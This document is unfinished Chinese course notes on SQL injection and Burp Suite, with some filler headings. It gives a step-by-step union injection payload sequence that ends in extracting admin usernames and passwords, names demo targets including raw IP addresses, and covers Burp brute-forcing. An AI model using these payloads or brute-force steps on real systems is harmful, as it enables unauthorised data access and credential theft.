SQL注入与burPsuit工具介绍

1. sql注入原理

   1. 原理：用户输入不可控，用户输入导致了sql语义发生了改变
      1. 用户输入不可控：网站不能控制普通用户的输入
      2. sql语义发生变化：
   2. 动态网页介绍：
   3. 网站数据请求
      1. 脚本语言：解释类语言，如，后端语言php/jsp/asp/aspx
      2. URL的构成
      3. 数据请求的方式
         1. GET:随着URL传输，传输数据量较小，不能传输铭感信息
         2. POST:在请求正文中传输，传输的数据量较大，可传输任何信息
   4. sql注入的类型
      1. 按数据类型分
         1. 字符型
         2. 数字型
      2. 安数据传输方式分
         1. GET型
         2. POST型
   5. sql注入发生的位置：
   6. 演示网站
      1. https://rimovni.exeye.run/mefe/login----某CTF平台
      2. http://139.155.224.134/grade/

2. 回显注入

   1. 回显注入的原理

      sql注入后的结果会出现到网页页面上。

      核心点就是union

   2. sql语言回顾

      1. 增

         1. INSERT INTO table_name VALUES (value1,value2,value3,...);
         2. INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);

      2. 删 DELETE FROM Websites WHERE name='Facebook' AND country='USA';

      3. 改

         UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;

      4. 查

   3. 回显注入的流程

      1. 找数据输入点
      2. 找有数据输出
      3. 判断注入类型 使用单双引号、注释符判断
      4. 确认漏洞是否存在：1' or 1=1 和1' or 1=2
      5. 判断列数 1' order by 1
      6. 判断回显位置 0' union select 1
      7. 找当前数据库 0' union select database()
      8. 找所有数据库名0' union select group_concat(schema_name) from information_schema.schemata
      9. 找所有的表名：0' union select group_concat(table_name) from information_schema.tables where table_schema='grade'
      10. 找所有字段名：0' union select group_concat(column_name) from information_schema.columns where table_schema='grade' and table_name='admins'
      11. 获取数据：0' union select group_concat(username,'~',password) from admins

   4. 特殊的库表

      1. 数据库的结构：库--->表--->字段（列名）--->数据。
      2. 特殊库：information_schema----->整个DBMS数据库信息
         1. schemata--->存有所有的库名 schema_name
         2. tables------->存有所有表的信息 table_schema 库 table_name 表
         3. columns---->存有所有字段的信息 table_schema 库 table_name 表 column_name 字段

3. burpsuite

   1. burpsuite的安装

   2. burpsuite的功能介绍

      1. 专业版含有漏洞扫描的功能，社区版没有此功能

         1. 破解版不能保证自身电脑的安全型

      2. 核心功能：拦截数据包，并且篡改数据包

         1. proxy:拦截数据包

            1. forward:提交数据包

            2. drop:丢弃数据包---数据包不会到达服务器

            3. intercept:选择burpsuite的工作状态

               1. on：处于拦截状态
               2. off：处于不抓包状态----数据包直接提交到服务器

            4. action：调用数据包处理工具

            5. 数据包状态

               raw:完整的数据包

               params:传输的数据

               header:请求数据用表格的形式展示

               hex:16进制展示底层数据。

      3. HTTP history

         1. 展示拦截数据包的历史信息。

      4. options:

         1. proxy listeners:选择代理连接信息

            1. add:添加代理信息
            2. edit:编辑，修改代理信息，选中需要修改的代理条目------>点击edit----->弹框中修改IP或端口
            3. remove:删除代理信息，选中需删除的代理条目---->点击remove

         2. intercept server response

            作用：开启或关闭响应拦截状态

      5. repeater

         1. 作用：数据包重放。
         2. 用处：
            1. 重放攻击
            2. sql注入\文件上传\XSS等绕过

      6. intruder

         1. 作用是暴力破解

            1. target展示出的是请求的服务的信息

            2. positsions:选择暴力破解的点于破解方式

               1. sniper:破解一个地方
               2. Nattering ram:可破解多个地方，但破解的点数据一样
               3. pitch fork:可破解多个相关性的点
               4. cluster bomb:可破解多个点，且多个点之间没有任何联系

            3. payloads:设置字典

               1. payload sets：选择为那一个破解点设置字典

               2. payload options:放置字典

                  1. paste
                  2. load：加载字典文件
                  3. remove：删除字典条目
                  4. clear:删除全部字典数据
                  5. add:手工添加字典

      7. 啊实打实

   3. burpsuite数据包操作

      1. 开代理

         1. firefox开代理：菜单--->选项--->高级--->网络--->连接--->设置---->手动配置代理

            （浏览的代理于burpsuite中设定的代理的ip源端口要一样）

         2. 阿斯顿

      2. 大苏打

   4. burpsuite暴力破解

      1. 暴力破解的原理

         1. 枚举-----试一试
         2. 简单---原理操作简单

      2. 暴力破解的操作。

         1. 安装插件：extender--->Bapp store--->install

      3. 暴力破解的难点

         1. 效率低
         2. 对有效字典的要求较高
         3. 对算法要求较高
         4. 对设备要求较高

      4. 暴力破解优化

         1. 信息收集---社工：http://221.237.108.18:8090/tyjgl/login.jsp#
         2. 多线程